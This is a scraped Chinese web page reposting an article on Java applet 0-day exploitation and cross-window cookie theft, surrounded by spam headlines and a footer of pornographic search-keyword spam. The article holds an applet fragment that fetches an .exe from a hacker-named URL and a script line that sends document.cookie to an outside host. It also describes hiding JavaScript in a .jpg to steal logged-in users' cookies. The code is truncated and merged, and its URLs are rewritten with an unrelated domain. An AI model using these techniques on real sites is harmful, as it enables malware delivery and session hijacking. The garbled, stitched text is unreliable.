『果冻直播下载』 俄报告:2016年俄罗斯酗酒及吸烟人数显著减少-Mobile

首页 > 学院 > 网络技术 > 正文

『果冻直播下载』 这家造型馆夸下海口定有适合你的婚纱秒变美新娘-Mobile

2022-09-28 21:39:35
字体:
来源:转载
供稿:网友

作者:空虚浪子心【XGC】

  【IT168专稿】引言

  因为一个0day,让作者对java applet心血来潮,随着不断的失败,发现了一个又一个论坛上某帖发出一篇通杀FF和IE的0DAY代码:

Java代码
  1. Import java.applet.Applet;            //加载applet包  
  2. 。。。。。。。。。。。。。。。。。。。。。。。省略  
  3.   
  4. public class Client extends Applet           //继承applet  
  5. {  
  6.     public void start()                   //重写applet的主要方法  
  7.     {  
  8.             。。。。。。。。。。。。。。。。。。。。。。。省略  
  9.             System.out.println(“aaa”);     //如果进入了这个方法,会打印“aaa”  
  10.             URL url = new URL("http://www.blackhathackerz.com.alejandravivanco.com/applet/Client.exe");  
  11.              //楼上代码,定义了要从这个地址中拿文件。  
  12. bufferedoutputstream=newBufferedOutputStream(new FileOutputStream("C://"http://www.inbreak.net.alejandravivanco.com/blog/default.asp?cookies="+document.cookie;  
  13.   </script>  

  3、我们想拿子窗体的cookie。

  4、只有同一个域下,才能取cookie。

  你应该感到有趣才是,因为作者不可能把一段废话一一列举在这里,你能想到什么呢?公布答案!假设我们能控制父窗体的代码,想要子窗体的cookie步骤:

  1、我们可爱的IE浏览器打开/Article/UploadFiles/200808/20080808105155534.jpg时,如果 jpg里面其实是js,发生什么?很好!会执行JS!步骤一的关键就是,往子窗口的域名下(网站),传一个jpg文件,里面是JS代码。Js代码用来:获 取cookie,然后使用AJAX 技术将cookie提交到同一个域的某个能储存东西的地方,比如留言本。

  2、既然要获取cookie,那浏览器至少要有子窗体的cookie,比如他登录过就会有cookie。让父窗体先打开子窗体的kxlzx.jpg,一秒,闪一秒就足够代码执行了,之后的事情就不用我说了。

  如果步骤一的条件有出入,没有可以储存东西的地方,你可以尝试以下代码绕过AJAX的跨域限制:

  以上步骤不仅仅可以应用于applet,还可以在js中实现。可以实现以上步骤的代码,本文已经写的够多了,请在楼上找吧。

  作者技术有限,目前研究到这里,给大家个研究方向:往applet底层实现进发,研究能绕过applet权限的函数,去年就出了一个。实践出真 知,作者的研究思路一定不是最好的,甚至文中或许还会有错误,但是文中代码都是作者通过无数次实践,才精挑细选出了最能说明问题的部分,希望能对大家有所 帮助。

  最后发几个小http://www.inbreak.net.alejandravivanco.com/attachment.php?id=5

发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
影音先锋av撸色soso 在线免费av欲望岛 大香蕉伊人av岛国电影 变态av日本网站 av家庭教师在线播放
av9jeg 漫画家在AV片场 北川瞳av封面番号 av女优白色丝袜 意大利av女演员大全
波多野结衣老师所有av 岛国av大片未满十八 日本av作品颁奖礼 韩国三级AV av影院在线视频
亚洲AV一宅男色影视 av棒是一边充电一边用 av手机天堂网迅雷 亚州天堂2014av 精品电影av